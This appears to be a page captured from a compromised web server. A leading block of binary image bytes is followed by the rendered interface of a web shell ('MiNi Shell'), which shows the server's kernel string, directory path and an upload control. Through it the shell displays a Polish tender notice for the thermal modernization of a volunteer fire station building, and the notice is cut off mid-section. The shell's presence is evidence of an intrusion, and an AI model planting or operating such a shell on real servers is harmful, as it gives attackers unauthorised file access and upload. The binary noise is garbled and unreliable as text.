JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220615/0021098701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku Ochotniczej Straży Pożarnej w Brzeskach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ochotnicza Straż Pożarna w Brzeskach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100609554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzeski 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brzeski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">436771693</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.gminasedziejowice.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Stowarzyszenie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona Przeciwpożarowa </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Sędziejowice</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">Regon 730934594</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Wieluńska 6</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Sędziejowice</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://gminasedziejowice.eu/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku Ochotniczej Straży Pożarnej w Brzeskach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e2ec541-ec93-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00210987</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00125301/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Termomodernizacja budynku Ochotniczej Straży Pożarnej w Brzeskach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_sedziejowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferta), zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem<br/>https://platformazakupowa.pl/pn/gmina_sedziejowice<br/>i formularza Wyślij wiadomość dostępnego na stronie dotyczącej danego postępowania. W sytuacjach awaryjnych np. w przypadku niedziałania platformazakupowa.pl Zamawiający może również komunikować się z<br/>wykonawcami za pomocą poczty elektronicznej: zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wym. tech. i org. wysyłania i odbierania dok. elektr., elektr. kopii dok. i oświadczeń oraz inf. przekazywanych przy ich użyciu opisane zostały w Regulaminie Inter.Platformy zakupowej platformazakupowa.pl Open Nexus Sp.z o.o. korzystania z https://platformazakupowa.pl/ i są dostępne<br/>przy każdym postępowaniu na platformie, regulamin platformy znajduje się w stopce strony lub pod adresem: https://platformazakupowa.pl/strona/1-regulamin 2.Za datę przekazania oferty, zawiad., dok. elektr., oświadczeń lub elektr. kopii dok. lub oświadczeń oraz innych inf. przyjmuje się datę ich przekazania na https://platformazakupowa.pl/ i otrzymania komunikatu<br/>potwier.3.Formaty plików wyk. przez Wyk. powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 lis.<br/>2017r. ws. ogł. jedno. tekstu rozp. Rady Ministrów ws. Krajowych Ram Interoperacyjności, min. wymagań dla rejestrów publ. i<br/>wymiany inf. w postaci elektr. oraz min. wymagań dla systemów teleinf.”.4.Zamawiający rek. wyk. formatów: .pdf .doc .xls .jpg (.jpeg)<br/>ze szczególnym wsk. na .pdf 5.W celu ewent. kompresji danych Zam. rek. wyk. jednego z formatów:.zip.7Z.6.Wśród formatów powszechnych a NIE występ. w rozp.występ.: .rar .gif .bmp .numbers .pages. Dok. złożone w takich plikach zostaną uznane za złożone nieskutecznie. 7.Zam. zwraca uwagę na ogr. wielkości plików podpisywanych profilem zaufanym, który wynosi maks. 10<br/>MB, oraz na ogr. wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB. 8.Zalecenia Zama. odnośnie kwalifikowanego podpisu elektr.: dla dok. w formacie „pdf” zaleca się podpis w formatem PadES,<br/>dok. w formacie innym niż „pdf” zaleca się podpisywać formatem XadES, Wyk. powinien pamiętać, aby plik z podpisem przekazywać<br/>łącznie z dok. podpisywanym,do składania podpisu zaleca się stosowanie algorytmu SHA-2 (lub wyższy).9.Ze względu na niskie<br/>ryzyko naruszenia integralności pliku oraz łatwiejszą wer. podpisu, Zam. zaleca, w miarę możliwości, przekonwertowanie plików<br/>składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. 10.Jeśli wyk. pakuje dok. np. w plik ZIP<br/>zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. 11.Zama. rek. wyk. podpisu z kwalifikowanym<br/>znacznikiem czasu.12.Zama.zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich. Może to skutkować<br/>brakiem integralności plików. 13.Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w<br/>wer.plików. 14.Kom. za pośrednictwem platformy zakupowej wymaga zał. konta Użytkownika.15.W celu zał. konta Użyt. na<br/>platformie zakupowej, koniecznym jest posiadanie przez Wyk. aktywnego konta poczty elektr. Korzystanie z platformy zakupowej<br/>przez Wyk. jest bezpłatne. 16.Zamawiający, zgodnie z Rozp. Prezesa Rady Ministrów z dnia 30 gr.2020r. ws. sposobu sporządzania<br/>i przek. inf. oraz wymagań tech. dla dok. elektr. oraz środków kom. elektr. w postęp. o udzielenie zam. publicznego lub konkursie<br/>(Dz. U. z 2020r. poz. 2452), określa niezbędne wym. sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer kl. PC lub MAC o następującej<br/>konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów oper. - MS Windows 7, Mac<br/>Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna, inna niż Internet Explorer, przeglądarka internetowa, włączona<br/>obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,Oznaczenie czasu odbioru danych przez platformę zakupową<br/>stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Gł. Urzędu<br/>Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/><br/>1)	administratorem Pani/Pana danych osobowych jest<br/>Ochotnicza Straż Pożarna w Brzeskach<br/>Brzeski 34<br/>98 – 160 Sędziejowice<br/>2)	z inspektorem ochrony danych osobowych w Ochotniczej Straży Pożarnej w Brzeskach można kontaktować się za pomocą adresu iod@gminasedziejowice.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Termomodernizacja budynku Ochotniczej Straży Pożarnej w Brzeskach”, znak postępowania ZP.271.2.2022 prowadzonym w trybie podstawowym, o którym mowa w art. 275 pkt 1 ustawy PZP;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres części I obejmuje:<br/>a.	Wykonanie instalacji grzewczej i chłodniczej co najmniej w zakresie:<br/>i.	rury i kształtki steel,<br/>ii.	otuliny,<br/>iii.	materiały pomocnicze,<br/>iv.	rury i kształtki PE- RT,<br/>v.	szafka rozdzielacza,<br/>vi.	rozdzielacz grzejnikowy,<br/>vii.	listwy przypodłogowe,<br/>viii.	okablowanie klimakonwektorów ,<br/>ix.	skropliny,<br/>x.	klimakonwektory kasetonowe + panel 2 kpl.<br/>xi.	zawór trójdrogowy z siłownikiem 2 kpl.<br/>xii.	sterownik ścienny 2 szt.<br/>xiii.	klimakonwektory ścienne wraz z wbudowanym sterownikiem 3 szt.<br/>xiv.	zawór trójdrogowy z siłownikiem 3 kpl.<br/>xv.	grzejnik KV 22/600/800 z osprzętem 1 szt.<br/>xvi.	grzejnik KV 22/600/720 z osprzętem 1 szt.<br/>xvii.	grzejnik KV 22/600/1000 z osprzętem 1 szt.<br/>xviii.	grzejnik KV 22/600/1800 z osprzętem 1 szt.<br/>xix.	grzejnik KV 33/ 900/720 z osprzętem 1szt.<br/>xx.	grzejnik KV 22/600/1200 z osprzętem 3 szt.<br/>xxi.	grzejnik KV 11/600/400 z osprzętem 1 szt.<br/>xxii.	grzejnik KV 11/600/520 z osprzętem 1 szt.<br/>xxiii.	grzejnik KV 22/600/400 z osprzętem 1 szt.<br/>xxiv.	montaż instalacji c.o.<br/>b.	Montaż gruntowej pompy ciepła co najmniej w zakresie:<br/>i.	pompa ciepła Alpha Innotec SW 262H3 25,6 kW,<br/>ii.	grupa pompowa PWP 4,<br/>iii.	pakiet pasywnego chłodzenia KSE 302,<br/>iv.	zawór przełączny USV 5/4,<br/>v.	grzałka elektryczna EHZ 60,<br/>vi.	płyta rozszerzająca LUX 2.1 – EP,<br/>vii.	kolektor pionowy + spirytus 6* 97 metrów,<br/>viii.	studnia z rozdzielaczem 6 obiegów,<br/>ix.	bufor Alpha Innotec TPS 750,<br/>x.	pompa c.o. 25/40-70 2 szt.<br/>xi.	elektryka,<br/>xii.	zawory, rury, kształtki, otuliny,<br/>xiii.	naczynie 33DE 1 szt.<br/>xiv.	naczynie 35N 1 szt.<br/>xv.	grupa bezpieczeństwa 2 szt.<br/>xvi.	montaż pompy ciepła + uruchomienie,<br/>xvii.	projekt robót geologicznych.<br/>c.	Montaż instalacji fotowoltaicznej co najmniej w zakresie:<br/>i.	panel fotowoltaiczny JA Solar 385 W – 18 szt.<br/>ii.	inwerter Solis 8,0 kW,<br/>iii.	moduł wi-fi,<br/>iv.	konstrukcja dach płaski,<br/>v.	przewody DC/AC, uziom,<br/>vi.	zabezpieczenia AC,<br/>vii.	materiały montażowe,<br/>viii.	montaż.<br/>d.	Zakup i montaż segmentowej bramy garażowej co najmniej o następujących parametrach:<br/>i.	szerokość 3300 x wysokość 2850 mm z panelami o wąskim tłoczeniu,<br/>ii.	struktura woodgrain,<br/>iii.	kolor czerwony (malowany RAL 3000),<br/>iv.	przeszklona – sekcja IPx1 sztuka na 3 panelu od dołu bramy,<br/>v.	bez uchwytu z zewnątrz,<br/>vi.	drzwi przejściowe umiejscowione pośrodku z progiem 90 mm i ramką,<br/>vii.	prowadzenie bramy standardowe (wał ze sprężynami umieszczony w nadprożu),<br/>viii.	obsługiwana ręcznie za pomocą wyciągarki łańcuchowej.<br/><br/>UWAGA:<br/>Jeżeli gdziekolwiek w SWZ, Zamawiający wskazał konkretne nazwy materiałów lub zawarł inne treści, które w sposób bezpośredni lub pośredni wskazują lub mogą wskazywać na konkretny wyrób, oznacza to, że zrobił to w celu doprecyzowania opisu przedmiotu zamówienia i określają minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu zamówienia.<br/>Zamawiający przy przygotowaniu oferty dopuszcza zastosowanie materiałów równoważnych, tj. o parametrach technicznych i użytkowych nie gorszych niż przywoływane w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-01-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Gwarancja – 40%.<br/>2.Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/><br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3.Punkty przyznane w ramach kryterium „Gwarancja” (G) zostaną przyznane według wzoru:<br/>G=G_z/G_max ×40pkt<br/>gdzie:<br/>	G – liczba punktów, którą uzyskała badana oferta w kryterium „Gwarancja”,<br/>	Gz – okres gwarancji zadeklarowany w ocenianej ofercie,<br/>	Gmax – najdłuższy możliwy okres gwarancji (60 miesięcy).<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego: 36 miesięcy.<br/>	Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 60 miesięcy.<br/>	Wykonawca może zaproponować okres gwarancji w przedziale od 36 do 60 miesięcy. Zaoferowany przez Wykonawcę okres gwarancji zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy okres gwarancji (60 miesięcy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje najmniej korzystny okres gwarancji (36 miesięcy) - otrzymuje 0 pkt.<br/>	W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, to przy ocenie oferty brany będzie pod uwagę najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert – 60 miesięcy.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (G) obliczoną wg powyższego wzoru.<br/>4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+G<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	G – liczba punktów uzyskanych w ramach kryterium „Gwarancja”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) 